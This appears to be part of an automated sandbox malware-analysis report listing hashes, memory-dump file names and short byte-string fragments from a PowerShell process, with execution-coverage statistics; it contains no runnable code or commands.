                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                  • API String ID: 0-2353078639
                                                  • Opcode ID: ced91efcf9216a9e0f007059f1ad855cc4c9bbe7b1544f31227b2f285a720c2a
                                                  • Instruction ID: 1dd65fd4ef56f8798347b5af3e0cc1c4dddc4da578f361e7aff22f7f37535b7a
                                                  • Opcode Fuzzy Hash: ced91efcf9216a9e0f007059f1ad855cc4c9bbe7b1544f31227b2f285a720c2a
                                                  • Instruction Fuzzy Hash: 927128B1B002178FEF149B7D88002BABBA9EF85615F14887AC865CB351DA36C951C7E1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful
                                                  • API String ID: 0-100295639
                                                  • Opcode ID: f551ffafa8961fbfca23a37d97138dadc8449182121235f1891717a2916f1c9b
                                                  • Instruction ID: 9b2f653039f3cdf10814be78895ffe6ddf59d206c5ceaf921e347d86abee1283
                                                  • Opcode Fuzzy Hash: f551ffafa8961fbfca23a37d97138dadc8449182121235f1891717a2916f1c9b
                                                  • Instruction Fuzzy Hash: A071BFB4A00105DFEB15CF5CC951AAABBF6EF88314F148569D804AB764DB32EC42CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Haq$$]q$$]q
                                                  • API String ID: 0-1533201563
                                                  • Opcode ID: 407a2f57a676922a539212044cc148f51f50dc9a4df289de0dc897fd6c5fec59
                                                  • Instruction ID: e6eaef47df637be346e6f96351bd9eb328ad73c8ae4bba0f7adecd4dd33be1a6
                                                  • Opcode Fuzzy Hash: 407a2f57a676922a539212044cc148f51f50dc9a4df289de0dc897fd6c5fec59
                                                  • Instruction Fuzzy Hash: 35223334B002189FCB29DB24D8547ADBBB6BF89304F1444A9D909AB361DF35AD85CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q$tP]q
                                                  • API String ID: 0-145478062
                                                  • Opcode ID: 838cc7d6d7c9333b25b053482b0c5d1b6e846f13b812d26dc64f6937f6fb3b6f
                                                  • Instruction ID: 3300d7e254e0e749e7bf7d55ade25f54c25facd5e5b7b38f20fb0d66639d8cef
                                                  • Opcode Fuzzy Hash: 838cc7d6d7c9333b25b053482b0c5d1b6e846f13b812d26dc64f6937f6fb3b6f
                                                  • Instruction Fuzzy Hash: 741280B0B4020A9FEB14DB9CC541AAABBF6FF85314F14C469E9099B355CB72DC42CB91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: / y$/ y
                                                  • API String ID: 0-3043203095
                                                  • Opcode ID: 3c5649f2a9d8ad11a74229c067517c14e9113f8df04f0f60d0f5f96571c35c62
                                                  • Instruction ID: 7e4db11d4dbb8f4beecd520cb1b51ed930907be1a0c79ffd4ccac6d6a57c3b6c
                                                  • Opcode Fuzzy Hash: 3c5649f2a9d8ad11a74229c067517c14e9113f8df04f0f60d0f5f96571c35c62
                                                  • Instruction Fuzzy Hash: 95B16E70E00259DFDF14CFACC9857DDBBF2AF88318F149129E815AB264EB34A941CB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: / y$/ y
                                                  • API String ID: 0-3043203095
                                                  • Opcode ID: b89002c61d6961c96181659d948ae3686603b47bb7cf5836636957cf6c0f7073
                                                  • Instruction ID: 8b0697b5252721f9fb6e33fd84575b3f15dd951c5e0cb6b5c7c53bb3d808958c
                                                  • Opcode Fuzzy Hash: b89002c61d6961c96181659d948ae3686603b47bb7cf5836636957cf6c0f7073
                                                  • Instruction Fuzzy Hash: 51A15070E00219DFDF10CFA8D9857DDBBF1AF88318F249529D819E7264EB74A845CB85
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful
                                                  • API String ID: 0-51623107
                                                  • Opcode ID: b916a7e852b7b19cec5f5592fb3e1e6af78eea77e32cbf001a7b954ee2604bc1
                                                  • Instruction ID: c83089e53bfe3db6e8e32b9dd8be225ed31520cbef3b56d23d11ced6fbdbd470
                                                  • Opcode Fuzzy Hash: b916a7e852b7b19cec5f5592fb3e1e6af78eea77e32cbf001a7b954ee2604bc1
                                                  • Instruction Fuzzy Hash: E261B1B4A00245DFEB16CF5CC581AAABBB6FF49318F1485AAD4046B725CB32E852CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q$tP]q
                                                  • API String ID: 0-145478062
                                                  • Opcode ID: 5d9b56d98e049b80cf6b66781e6f3e0e0bef4585db998faa59982958a069a713
                                                  • Instruction ID: 03047203634621bc1646ac4b668990e808514d0732653aeff952defffb820561
                                                  • Opcode Fuzzy Hash: 5d9b56d98e049b80cf6b66781e6f3e0e0bef4585db998faa59982958a069a713
                                                  • Instruction Fuzzy Hash: 45517A717043579FEF254A6DC840766BBEAAFC2319F18C47BD559CB291DA71C840C3A1
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e5c67ccb45a22bf40dcc2aee7de83ad68f3aa1b0e3ad0cd8585cfd309c317732
                                                  • Instruction ID: 73fedf70a3c9320b4587d0b05068f750828aabf23eb90facea7c9c341ca6e3f7
                                                  • Opcode Fuzzy Hash: e5c67ccb45a22bf40dcc2aee7de83ad68f3aa1b0e3ad0cd8585cfd309c317732
                                                  • Instruction Fuzzy Hash: 14C1AD35A00208CFCB14DFA4D944AADBBF6FF84314F158569E806AB364DB74ED59CB80
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c80de31e5f47afd95fed6034956bc15a7f8084f709432845484153afb5fde7c3
                                                  • Instruction ID: 0c0b7a6694bbb22c7fee4700c0275ec77be2eea5bad23f1ee3a088b5728c7635
                                                  • Opcode Fuzzy Hash: c80de31e5f47afd95fed6034956bc15a7f8084f709432845484153afb5fde7c3
                                                  • Instruction Fuzzy Hash: 4C918B74A002098FCB05CF58C5D49AEBBB1FF89314B25899AD945AB3A5C732FC51CFA0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec1e8dd0dd9ba217c8a6cefbc783eb5b21cb391a6a8a45319d5ad4ee99d5db10
                                                  • Instruction ID: 98ffb3b820f6d2e53fbfc1a6dbc071ad64ca77b280b7a6789b36635e445987fe
                                                  • Opcode Fuzzy Hash: ec1e8dd0dd9ba217c8a6cefbc783eb5b21cb391a6a8a45319d5ad4ee99d5db10
                                                  • Instruction Fuzzy Hash: 5171AC30A002498FCB14DF68C880A9EBBF6FF89314F14856ED4599B261EB75AC46CB90
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f721d4f62e33fe9d8509bc41e54d6582ba053d41f5ade3e07e4ee93ab75ea684
                                                  • Instruction ID: 7418c0853f11161b83a3c7e075d4b82da1f1499f6e50714765643e22e64faf45
                                                  • Opcode Fuzzy Hash: f721d4f62e33fe9d8509bc41e54d6582ba053d41f5ade3e07e4ee93ab75ea684
                                                  • Instruction Fuzzy Hash: E4714C71A00209DFDB18DFA4D444BADBBF6FF88308F148529D816AB360DB35AD56CB51
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ffbf581393cbd2c7b4ea1260866f1255e557943c13ca4996af53eb781faa8309
                                                  • Instruction ID: 7ef7d3d1e710db222d9f2c1aac7c0db2ba797c63b783df76290e73274855d7f2
                                                  • Opcode Fuzzy Hash: ffbf581393cbd2c7b4ea1260866f1255e557943c13ca4996af53eb781faa8309
                                                  • Instruction Fuzzy Hash: F54178F2700100ABDF24977C9511AADBB9ADFD3219B1088FEC9019B251CE32D919C3A2
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59adfb4c803d52feed6374cf83fb37c7ceadef8849fece589d698073bd54e6f5
                                                  • Instruction ID: 848fc353c82fbe23b1750fcbe7066957805af4179af654f7abd68d85a099688a
                                                  • Opcode Fuzzy Hash: 59adfb4c803d52feed6374cf83fb37c7ceadef8849fece589d698073bd54e6f5
                                                  • Instruction Fuzzy Hash: CC418C70A00218CFDB18DFA5D844AADBBB2FF88344F14846DD406AB7A5DB74AD45CB91
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: be76f020e8a85db835b42fd22493eb234780d4a0c127eb3dc9eabe992c7f603b
                                                  • Instruction ID: 21ee580dcf174c6262f2d2bea401ef250b42af4c821f97c9279136660e51d998
                                                  • Opcode Fuzzy Hash: be76f020e8a85db835b42fd22493eb234780d4a0c127eb3dc9eabe992c7f603b
                                                  • Instruction Fuzzy Hash: 5D414874A006099FCB09CF58C1D49AAFBB1FF48314B1585A9D945AB365C732FC91CFA4
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 536a265a5c4b4369eb1bbe987d1a1ce9d156147406e48aec4905ff6b23e4c3de
                                                  • Instruction ID: 9865902d9c37919913d0d6aebb04bace484133adbcc6055cb5ae03316ed706cf
                                                  • Opcode Fuzzy Hash: 536a265a5c4b4369eb1bbe987d1a1ce9d156147406e48aec4905ff6b23e4c3de
                                                  • Instruction Fuzzy Hash: 6D2149B130431BABEB285AFE894177777DAAFC4719F14883AA556CB294CE76CC418360
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 20f26fcfcb108ebffb8e3d89ea844343e93cde60243463b7031e2c6a4e307dce
                                                  • Instruction ID: e79dd4a729a245324e8d29a915923807ad7fb568d8907be5228fac7421239e85
                                                  • Opcode Fuzzy Hash: 20f26fcfcb108ebffb8e3d89ea844343e93cde60243463b7031e2c6a4e307dce
                                                  • Instruction Fuzzy Hash: 59312C34B012189FCF25DB64D8557EEBBB2AF49305F1044E9D909AB361CB35AE86CF81
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f6132e437f35e5856fc5c5018a3fd274a2530e918288f6ff3203e5b335bbafa6
                                                  • Instruction ID: 1e70e43ed8bc8bfa9e50ed233c553b123a409acd88ab76eb98a149663f5f61db
                                                  • Opcode Fuzzy Hash: f6132e437f35e5856fc5c5018a3fd274a2530e918288f6ff3203e5b335bbafa6
                                                  • Instruction Fuzzy Hash: 65214FF230434F6BEB2406BE89407727BA59F45715F18887AE594CB2D6CE758D80C371
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 144a4e015d877dad18560fa64bbb5189c3ef60c9b7bf25541a53cd626f0e7d95
                                                  • Instruction ID: eb394bd70fa15810a931a2b881912405e18881d263d24af70bde1f77065bd10f
                                                  • Opcode Fuzzy Hash: 144a4e015d877dad18560fa64bbb5189c3ef60c9b7bf25541a53cd626f0e7d95
                                                  • Instruction Fuzzy Hash: 8F11F3B1A0021A9BEF149FAD85401ADB7E9AF88614B248975CC6AA7300D6309D40CBE0
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2431015764.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_4e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4a9c648626089afa3b5850c8f4c5cffafc4de417916733283d90600ae1de703e
                                                  • Instruction ID: 203f7cce81667c5c88274497419991277e00ed140a618e50a4cc09afe621e76d
                                                  • Opcode Fuzzy Hash: 4a9c648626089afa3b5850c8f4c5cffafc4de417916733283d90600ae1de703e
                                                  • Instruction Fuzzy Hash: C9012CB8A402149FCB04DB98D4906E9F771FF8E314B259559D85A9B362CA36EC07CB50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: (ful$(ful$(ful$(ful$(ful$4']q$4']q$4']q$4']q$tLgk$tLgk$x.fk$-fk
                                                  • API String ID: 0-3601915493
                                                  • Opcode ID: f1bf863337b4278a7223a0259b2f477e28a81f7a85201b139bead2fcc80c03c1
                                                  • Instruction ID: e68bf80419170e0c1fa8e772081029c5c8b85c9418b72749acb40d6639ba6762
                                                  • Opcode Fuzzy Hash: f1bf863337b4278a7223a0259b2f477e28a81f7a85201b139bead2fcc80c03c1
                                                  • Instruction Fuzzy Hash: 232253B4A402149FDB24DF28C950BEAB7B2FF49304F1085A9D5096B791CB76EE81CF91
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$84sl$84sl$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
                                                  • API String ID: 0-2247629088
                                                  • Opcode ID: a2a735e2b37315bc90e76bfe12135352e65e9c04188581bc0c79128839a5f12a
                                                  • Instruction ID: 322df90fe4e12ca8a5cd1f7f0f9957c769135e5af639768e0b5ba1b964fd429b
                                                  • Opcode Fuzzy Hash: a2a735e2b37315bc90e76bfe12135352e65e9c04188581bc0c79128839a5f12a
                                                  • Instruction Fuzzy Hash: 617101B5B102068FEF248F6CC9507AAFBABEF85719F188875D801CB294CB75D841C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tP]q$tP]q$$]q$$]q$$]q$$]q$kl$kl
                                                  • API String ID: 0-913898323
                                                  • Opcode ID: aaf390ba9eadc092f8381b2dfc13c8e9980cf8803a30e9547025b661b8b5d9af
                                                  • Instruction ID: 656f7c5c8bd728a5eaf752036364137927e069715dd22cd4a594b2c3144b5305
                                                  • Opcode Fuzzy Hash: aaf390ba9eadc092f8381b2dfc13c8e9980cf8803a30e9547025b661b8b5d9af
                                                  • Instruction Fuzzy Hash: EB516C717243059FEF254AED8801B67BBAAAFC2715F14887BE4498B2A1DE71CC00C3A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Tek$0U]q$4']q$4']q$XYul$XYul
                                                  • API String ID: 0-2521075095
                                                  • Opcode ID: e2c5f275cae0123a7b14a87fcb31ddeae56a8aa660821ca372f6f9c9f417ffe3
                                                  • Instruction ID: 1d0f856225aab73b3167d1d0a95b5407efb7027f0a8695826060cbbd2a8c1d6d
                                                  • Opcode Fuzzy Hash: e2c5f275cae0123a7b14a87fcb31ddeae56a8aa660821ca372f6f9c9f417ffe3
                                                  • Instruction Fuzzy Hash: FF7125B1B052058FEB148B6DD440A6AFBEAEFD7225B28C47ED509CB255DA32C801C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q$$]q$$]q
                                                  • API String ID: 0-3723351465
                                                  • Opcode ID: 85bae768347ab60815253b8a7d067cc3a88c6f62b783feb8cbaa662c786993ce
                                                  • Instruction ID: 39df360acb119120f8cba31ea177424a540d9c3e673a150cbc9fffaba360b72f
                                                  • Opcode Fuzzy Hash: 85bae768347ab60815253b8a7d067cc3a88c6f62b783feb8cbaa662c786993ce
                                                  • Instruction Fuzzy Hash: F03107B27143478FFF294AAE9891176F7A9EFC1619B18C87FC8468B241DE35C415C352
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$84sl$d%cq$d%cq$d%cq$tP]q
                                                  • API String ID: 0-3943785754
                                                  • Opcode ID: 976952f187e7d268a8ef5f0610714df002c503cf55eda6913579a332aed5c4ba
                                                  • Instruction ID: a8cb382aabfda638740a168adc565a476cdb20ea2802dff83414f8679ed17380
                                                  • Opcode Fuzzy Hash: 976952f187e7d268a8ef5f0610714df002c503cf55eda6913579a332aed5c4ba
                                                  • Instruction Fuzzy Hash: A431A1B4B00215DFDB24CF5CC580AAAFBA7FB88728F248565E8059B355C771ED01CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$4']q$4']q$$]q$$]q
                                                  • API String ID: 0-2669322367
                                                  • Opcode ID: ca29e63b99e0ccdcfa2f7854d4984c7446435fb2732858ece52bd6c9c17286a7
                                                  • Instruction ID: a1d1de8226cf3057ca7d6be688603e9752f02b6a27b475473135af4d27befe51
                                                  • Opcode Fuzzy Hash: ca29e63b99e0ccdcfa2f7854d4984c7446435fb2732858ece52bd6c9c17286a7
                                                  • Instruction Fuzzy Hash: 8B216D717093574FEB3A153C3421279AFEA9FC296872D48BBC4A1CB346CE154C068397
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84sl$84sl$tP]q$tP]q$$]q
                                                  • API String ID: 0-454792928
                                                  • Opcode ID: d29fa60c6600ed8d4358ac4cbef4ad48cf3a7885fb90f7e8a46ee52633a8c148
                                                  • Instruction ID: 66da7a29b4cc63d27165ba59c578f4638d1132076168451821bcaaad5f3fd402
                                                  • Opcode Fuzzy Hash: d29fa60c6600ed8d4358ac4cbef4ad48cf3a7885fb90f7e8a46ee52633a8c148
                                                  • Instruction Fuzzy Hash: C46103B1B001069FEF249BAC8540AAAFBE7AF88719F14C869D805CB256CB35DC41C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                  • API String ID: 0-2353078639
                                                  • Opcode ID: c6f9045c5f23118282fa89f91c0c9caddbd32e093d85dcc888ecc36da431d1a8
                                                  • Instruction ID: d74092479f60574007f8036988f21de17b81a9f73e401aacfddd877f739ad0e7
                                                  • Opcode Fuzzy Hash: c6f9045c5f23118282fa89f91c0c9caddbd32e093d85dcc888ecc36da431d1a8
                                                  • Instruction Fuzzy Hash: D94136B1704307AFEF255B3D88106BE7BAAAF82215F04447AD825CB251DF35C955C7A3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,Sul$,Sul$]$p5ek$xSul
                                                  • API String ID: 0-605379440
                                                  • Opcode ID: 38c7f290cc2898d994eb325f4ff36307c3b0d0bdce75498ac51aa697eddf8616
                                                  • Instruction ID: 86538c0af87e8bd82f7f41346c68ec6efd14e9f9c0c10b6117b08d5e4c8bba3b
                                                  • Opcode Fuzzy Hash: 38c7f290cc2898d994eb325f4ff36307c3b0d0bdce75498ac51aa697eddf8616
                                                  • Instruction Fuzzy Hash: 934136B1B14305AFDB208ABE85017AABFEAAF86314F14847AD409CF351DE75D850C7A2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4']q$4']q$$]q$$]q$$]q
                                                  • API String ID: 0-2353078639
                                                  • Opcode ID: 88623342704e69ea6f065ad3230116dc1035ada97e26ff4f347168a7a9559cbd
                                                  • Instruction ID: 4e6fc82d7136bee63095760a5a400bc3b9cde7b25acd4bbd6e4a45a595fa53a5
                                                  • Opcode Fuzzy Hash: 88623342704e69ea6f065ad3230116dc1035ada97e26ff4f347168a7a9559cbd
                                                  • Instruction Fuzzy Hash: 313166B2B04216CFFF284A7E9894676F7DBAFC5399B28487BC841CA244CA39C455C752
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 84sl$84sl$tP]q$tP]q
                                                  • API String ID: 0-3415725813
                                                  • Opcode ID: 182e4cd6dcde8ae888c26069975ef1fb24f2f27988a4c916844b45b7972c7f29
                                                  • Instruction ID: f7e159f3d2908c56c950338439747e2d7a787d32af6a6e739a058f97e9e62b3b
                                                  • Opcode Fuzzy Hash: 182e4cd6dcde8ae888c26069975ef1fb24f2f27988a4c916844b45b7972c7f29
                                                  • Instruction Fuzzy Hash: 01914DB1700206AFDF189F6DC89177ABBEABF85714F1888B9D8458F291DA71D841C3A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2436445372.0000000007990000.00000040.00000800.00020000.00000000.sdmp, Offset: 07990000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7990000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $]q$$]q$$]q$$]q
                                                  • API String ID: 0-858218434
                                                  • Opcode ID: 81c414f25b06a87305ec09400857c4e36426faeec83c9c18c9005157faf71692
                                                  • Instruction ID: 213976e7b053b505347d41d427df03977d4f5d282928d9f47f58270af8da8e77
                                                  • Opcode Fuzzy Hash: 81c414f25b06a87305ec09400857c4e36426faeec83c9c18c9005157faf71692
                                                  • Instruction Fuzzy Hash: 39212CB13142065BFF38596E8D4172776DA9BC1729F24883EA94DCB281ED76E840C761

                                                  Execution Graph

                                                  Execution Coverage:13%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:84
                                                  Total number of Limit Nodes:9
